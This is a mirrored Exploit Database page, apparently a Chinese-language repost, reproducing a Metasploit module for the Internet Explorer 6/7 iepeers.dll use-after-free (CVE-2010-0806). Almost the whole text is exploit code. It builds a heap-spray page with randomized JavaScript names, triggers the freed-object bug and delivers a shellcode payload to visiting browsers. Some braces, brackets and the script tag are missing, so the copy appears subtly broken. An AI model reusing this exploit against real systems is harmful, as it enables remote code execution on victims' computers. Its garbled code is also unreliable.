Microsoft Internet Explorer – ‘iepeers.dll’ Use-After-Free (Metasploit)

Exploit Database
101 阅读

作者： Trancer

日期： 2010-03-10
类别：
- remote
平台：
- windows
来源：https://www.exploit-db.com/exploits/11683/

100

101

102

103

104

105

106

107

108

109

110

111

112

113

114

115

116

117

118

119

120

121

122

123

124

125

126

127

128

129

130

131

132

133

134

135

# ie_iepeers_pointer.rb

# Microsoft Internet Explorer iepeers.dll use-after-free exploit for the Metasploit Framework

# Tested successfully on the following platforms:

#- Microsoft Internet Explorer 7, Windows Vista SP2

#- Microsoft Internet Explorer 7, Windows XP SP3

#- Microsoft Internet Explorer 6, Windows XP SP3

# Exploit found in-the-wild. For additional details:

# http://www.rec-sec.com/2010/03/10/internet-explorer-iepeers-use-after-free-exploit/

# Trancer

# http://www.rec-sec.com

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote

Rank = GoodRanking

include Msf::Exploit::Remote::HttpServer::HTML

def initialize(info = {})

super(update_info(info,

'Name' => 'Microsoft Internet Explorer iepeers.dll use-after-free',

'Description'=> %q{

This module exploits a use-after-free vulnerability within iepeers.dll of

Microsoft Internet Explorer versions 6 and 7.

NOTE: Internet Explorer 8 and Internet Explorer 5 are not affected.

'License'=> MSF_LICENSE,

'Author' => [

'Trancer <mtrancer[at]gmail.com>'

'Version'=> '$Revision:$',

'References' =>

[

[ 'CVE', '2010-0806' ],

[ 'OSVDB', '62810' ],

[ 'BID', '38615' ],

[ 'URL', 'http://www.microsoft.com/technet/security/advisory/981374.mspx' ],

[ 'URL', 'http://www.avertlabs.com/research/blog/index.php/2010/03/09/targeted-internet-explorer-0day-attack-announced-cve-2010-0806/' ]

'DefaultOptions' =>

{

'EXITFUNC' => 'process',

'InitialAutoRunScript' => 'migrate -f',

'Payload'=>

{

'Space' => 1024,

'BadChars'=> "\x00\x09\x0a\x0d'\\",

'StackAdjustment' => -3500,

'Platform' => 'win',

'Targets'=>

[

[ 'Windows XP SP0-SP3 / IE 6.0 SP0-2 & IE 7.0', { 'Ret' => 0x0C0C0C0C } ]

'DisclosureDate' => 'Mar 09 2010',

'DefaultTarget'=> 0))

end

def on_request_uri(cli, request)

# Re-generate the payload

return if ((p = regenerate_payload(cli)) == nil)

# Encode the shellcode

shellcode = Rex::Text.to_unescape(payload.encoded, Rex::Arch.endian(target.arch))

# Set the return\nops

ret = Rex::Text.to_unescape([target.ret].pack('V'))

# Randomize the javascript variable names

j_shellcode = rand_text_alpha(rand(100) + 1)

j_nops = rand_text_alpha(rand(100) + 1)

j_slackspace = rand_text_alpha(rand(100) + 1)

j_fillblock = rand_text_alpha(rand(100) + 1)

j_memory = rand_text_alpha(rand(100) + 1)

j_counter = rand_text_alpha(rand(30) + 2)

j_ret = rand_text_alpha(rand(100) + 1)

j_array = rand_text_alpha(rand(100) + 1)

j_function1 = rand_text_alpha(rand(100) + 1)

j_function2 = rand_text_alpha(rand(100) + 1)

j_object = rand_text_alpha(rand(100) + 1)

j_id = rand_text_alpha(rand(100) + 1)

# Build out the message

html = %Q|<html><body>

function #{j_function1}(){

var #{j_shellcode} = unescape('#{shellcode}');

#{j_memory} = new Array();

var #{j_slackspace} = 0x86000-(#{j_shellcode}.length*2);

var #{j_nops} = unescape('#{ret}');

while(#{j_nops}.length<#{j_slackspace}/2) { #{j_nops}+=#{j_nops}; }

var #{j_fillblock} = #{j_nops}.substring(0,#{j_slackspace}/2);

delete #{j_nops};

for(#{j_counter}=0; #{j_counter}<270; #{j_counter}++) {

#{j_memory}[#{j_counter}] = #{j_fillblock} + #{j_fillblock} + #{j_shellcode};

}

function #{j_function2}(){

#{j_function1}();

var #{j_object} = document.createElement('body');

#{j_object}.addBehavior('#default#userData');

document.appendChild(#{j_object});

try {

for (#{j_counter}=0; #{j_counter}<10; #{j_counter}++) {

#{j_object}.setAttribute('s',window);

}

} catch(e){ }

window.status+='';

}

document.getElementById('#{j_id}').onclick();

</script></body></html>|

print_status("Sending #{self.name} to #{cli.peerhost}:#{cli.peerport}...")

# Transmit the compressed response to the client

send_response(cli, html, { 'Content-Type' => 'text/html' })

# Handle the payload

handler(cli)

end